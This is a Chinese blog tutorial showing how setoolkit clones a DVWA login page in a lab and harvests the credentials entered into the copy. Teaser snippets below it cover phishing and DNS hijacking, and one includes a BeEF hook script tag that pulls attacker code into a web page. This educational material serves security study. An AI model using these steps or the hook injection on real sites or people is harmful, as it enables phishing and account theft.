使用setoolkit进行社会工程学攻击获取账号密码

最新推荐文章于 2024-05-28 18:22:12 发布
最新推荐文章于 2024-05-28 18:22:12 发布
阅读量1.4k 收藏 10
点赞数 4
分类专栏: Kali Linux 文章标签: 信息安全 Kali Linux 渗透测试 setoolkit 社会工程学
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40228200/article/details/125304884
版权

今天继续给大家介绍渗透测试相关知识,本文主要内容是使用setoolkit进行社会工程学攻击获取账号密码。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、setoolkit工具简介

在前文使用HTTrack克隆网站中,我们使用了HTTrack工具,克隆下了站点的源码。今天,我们再介绍setoolkit工具,也可以克隆目标站点,但是其真正的作用在于伪装成真正的站点,诱导其他人登录,然后可以借此获取该用户的用户名、密码等信息。

二、setoolkit工具使用

接下来,我们就使用setoolkit工具来尝试克隆DVWA的站点,并尝试获取用户名和密码信息。站点页面如下所示:
在这里插入图片描述
我们在Kali Linux系统中,执行命令:

setoolkit

即可打开setoolkit页面,如下所示:
在这里插入图片描述
在上述页面中,我们选择1,即社会工程学攻击,之后,会进入到如下页面:
在这里插入图片描述
在该页面处,我们选择2,即web攻击工具。之后,进入到如下页面:
在这里插入图片描述
在该页面中,我们选择3,即凭证获取。之后会进入到如下页面:
在这里插入图片描述
在这里,我们选择2,即站点克隆,之后会跳转到如下页面:
在这里插入图片描述
在这里,我们输入要监听设备的IP地址(即本机IP地址),然后再输入目标站点的URL,就可以开启监听了。

三、效果展示

这里,我们访问Kali Linux,发现克隆后的站点,与之前的站点一模一样,如下所示:
在这里插入图片描述
我们输入用户名和密码,此时会跳转到正常的站点,如下所示:
在这里插入图片描述
但是,我们在Kali Linux的后台中已经获取到了目标站点的用户名和密码信息,如下所示:
在这里插入图片描述
从上图中可以看出,我们使用setoolkit进行社会工程学攻击获取账号密码成功!
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

永远是少年啊
关注
专栏目录
网络安全之社工攻击的防护
2301_76694151的博客
05-18 1031
靠人工实现的检测流程是繁琐的,自动化流程在整个方案过程能起到锦上添花的作用,也能大幅度降低重复性的工作,但也并不是说一定要有SOAR才可以对微信社工攻击进行防范。我们在不具备完整自动化平台的情况下,利用SYSMON+Powershell+TaskSchedule+反病毒沙箱已经可以很大程度上实现本文所说的攻击防护,能有效地减小和缓解微信社工攻击所带来的危害。
渗透测试 ( 9 ) --- 社会工程攻击工具 setoolkit
墨鱼菜鸡
07-11 2449
github 地址:https://github.com/trustedsec/social-engineer-toolkit kali工具 -- setoolkit(克隆网站及利用):https://blog.csdn.net/weixin_41489908/article/details/103851057 1、社会工程学概念 社会工程学通常以...
社会工程学之黑客番外——密码学
m0_46347405的博客
04-22 3382
社会工程学之黑客番外——密码学
密码破解与社会工程学
weixin_62304542的博客
07-30 642
密码破解与社会工程学
太可怕!看看黑客是怎样利用社会工程学窃取你的密码?
weixin_30369041的博客
09-25 749
  在信息安全的背景下,黑客是如何利用社会工程学攻击的?我们应该如何防护?社会工程是指人们对执行行为或泄露机密信息的心理操纵。一种用于信息收集,欺诈或系统访问的信任技巧,它与传统的“骗局”不同之处在于它通常是更复杂的欺诈方案的许多步骤之一。“社会工程”这一术语是一种对人类进行心理操纵的行为,也与社会科学有关,但它的使用已经在计算机和信息安全专业人员流行起来。   所有社会工程...
利用社会工程学SET进行口令破解
robacco的博客
09-23 390
一、概述 本次实验是实际上是利用kali自带的社会工程学工具(Social-Engineering Toolkit)制作钓鱼网站,原理是攻击者通过伪造虚假网页,并将通过链接方式发送给网站用户,当用户点开和原网站高度逼真的网页并输入自己的口令时(如用户名、密码等),攻击者则可以在后台取得这些用户的口令。 二、实验过程 1、进入SET 2、选择1 Web Site Attack Vecto...
Kali工具社会工程学攻击与防范
社会工程学攻击是一种利用人的心理弱点和社交技巧的攻击方法,通过欺骗、操控和迫使目标人员来获取敏感信息或实施非法行为。社会工程学攻击通常不直接利用技术漏洞,而是通过与目标人员的互动来实施欺诈。 ## 1.2 ...
社会工程攻击——setoolkit使用
最新发布
weixin_65768077的博客
05-28 1657
社会工程攻击(Social Engineering Attack)是一种利用人类心理和社会行为学的原理,通过欺骗、操纵或诱导等手段,使目标个体泄露敏感信息或执行特定操作的网络攻击方式。SEToolkit(Social-Engineer Toolkit,简称SET)是一个开源的社会工程学攻击工具集,它旨在帮助安全研究人员和渗透测试人员模拟各种社会工程学攻击场景,以评估目标系统的安全防御能力。
Linux kali内网渗透之DNS劫持+SET社会工程学进行内网钓鱼攻击
热门推荐
Pythonicc的博客
03-20 11万+
受害主机IP:192.168.20.236 攻击主机IP:192.168.20.164 网关:192.168.21.254 若攻击主机kali是虚拟机,需保证虚拟机的kali是桥接模式 收集信息阶段 获取到本机IP地址 ip address 获取到网关地址 route -n 获取内网同网段下正在联网的所有电脑IP地址 fping -g 192.168.20.0/23 实施攻击阶段 ...
setoolkit简易社会工程学攻击
Deeeelete的博客
01-23 2085
工具kali自带,终端输入setoolkit回车,如果是第一次打开的话会给提示,输入y回车同意使用 1.setoolkit 2.进入软件界面,上方的logo部分这里我就不去截图了,直接看最下方的菜单界面,这里我们选择第一个 social engineering attacks社会工程攻击 3.回车后进入下一个界面,一大串洋文,这里选择第二个,Website Attack Vectors(网...
社工利器--setoolkit之钓鱼攻击
Aisen_bear的博客
08-04 2437
该文章仅供参考学习,切勿用于非法用途 简介 社会工程学(Social Engineering)认为人为因素才是安全的软肋。很多企业、公司在信息安全上投入大量的资金,最终导致数据泄露的原因,往往却是发生在人本身。你们可能永远都想象不到,对于黑客们来说,通过一个用户名、一串数字、一串英文代码,社会工程师就可以通过这么几条的线索,通过社工攻击手段,加以筛选、整理,就能把你的所有个人情况信息、家庭状况、兴趣爱好、婚姻状况、你在网上留下的一切痕迹等个人信息全部掌握得一清二楚。虽然这个可能是最不起眼,而且还是最麻烦的
Hack The Box——SneakyMailer
江左盟的博客
08-18 1万+
简介 信息收集 漏洞发现 漏洞利用 权限提升 总结
网站克隆:setoolkit社工软件
qq_41679358的博客
09-20 2431
本文转自行云博客https://www.xy586.top beef-xss 安装beef-xss:apt install beef-xss 安装完成之后运行beef-xss: 登录网址:http://192.168.232.138:3000/ui/authentication 将beef-xss生成的js代码,放入网站 <script src="http://192.168.232.138:3000/hook.js"></script> 被攻击目标打开网页链接,则beef.
社工工具包 SEToolkit
CSDN
08-14 5909
社会工程学(Social Engineering)简称社工,其通过分析攻击对象的心理弱点,利用人性的本能反应,以及任何好奇心,贪婪等心理特征进行的,使用诸如假冒,欺骗,引诱等多种手段来达成攻击目标的一种手段,社会工程学的应用领域非常之广泛,而很多黑客也会将社工运用到渗透的方方面面,社工也被称为没有技术,却比技术更强大的渗透方式,正所谓 “攻城为下,攻心为上” 这句话用在社工上面是最恰当不过的啦。
网安实训(五)| SET 社会工程学工具的使用
朔方鸟的博客
02-17 1687
SET是一种利用社会工程学原理的工具,本实验将利用该工具,进行敏感信息的获取
Kali Linux社会工程学攻击与防范
社会工程学攻击是通过利用人们的信任、好奇心、恐惧或者其他人类的天生倾向来获取未经授权的访问权限或者敏感信息的攻击手段。它利用心理学原理,通过欺骗、偷窥、逼迫等手法,诱使受害者违背正常的安全意识,造成...
社会工程攻击——setoolkit使用(含错误解决)
m0_57069925的博客
06-08 1万+
此文章可学习钓鱼网站生成的技巧,切勿用于真实环境,仅用于学习,若产生一切后果,由产生者负责社会工程攻击,是一种利用“社会工程学” (Social Engineering)来实施的网络攻击行为。比如免费下载的软件捆绑了流氓软件、免费音乐包含病毒、钓鱼网站、垃圾电子邮件包括间谍软件等,都是近来社会工程学的代表应用。Kali Linux系统集成了一款社会工程学工具包 Social Engineering Toolkit (SET),它是一个基于Python的开源的社会工程学渗透测试工具。这套工具包由Davi
segatex 图形化的SELinux策略编辑器
cnbird's blog
10-06 1141
开发语言: 不详 项目主页: http://sourceforge.net/projects/segatex/ 文档地址: 下载地址: http://sourceforge.net/project/platformdownload.php?group_id=156582
社会工程学密码字典
m0_62207482的博客
01-31 1302
以及目标的社交网络查询到他的基本信息。在网络飞速发展的时代,人们的生活越来越离不开网络,网站。利用搜集到的信息,并依据。惯,生成的社会工程学字典在破解的过程效果显著。接下来编写一个密码字典的生成脚本,具体步骤如下。搜集到的信息越多,得到的字典。同时,我们还需要一份热门的常用密码字典,里。在获取私人账户信息时,用得最多的就是社会工程。函数,字典生成算法主体,读者也可以增加自己的。等时常索要我们的信息,信息泄露的事件也屡见不。泄露,但是可以减少信息泄露以及泄露后带来的危。这样,密码字典就生成好了。
黑客的最高境界——社会工程学
A1_3_9_7的博客
12-21 1096
这个所谓的“代表”实际上可能是一个犯罪分子,他们可能会要求您“验证身份”,让您登录到“他们的系统”,或登录您的计算机,并允许他们远程访问您的计算机,以便“帮助”您修复它,或者指导您输入一些命令来自行修复——但他们告诉您输入的这些命令可能会为犯罪分子稍后重新访问您的计算机打开后门。然后,攻击者可能会将你的信息卖给其他人,这样他们也可以对你、你的朋友、甚至你朋友的朋友发动攻击,因为他们知道人们往往会错误地信任他人。上当的人可能会感染恶意软件,这种软件可能会对他们自己和他们的联系人制造出新的安全漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

永远是少年啊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值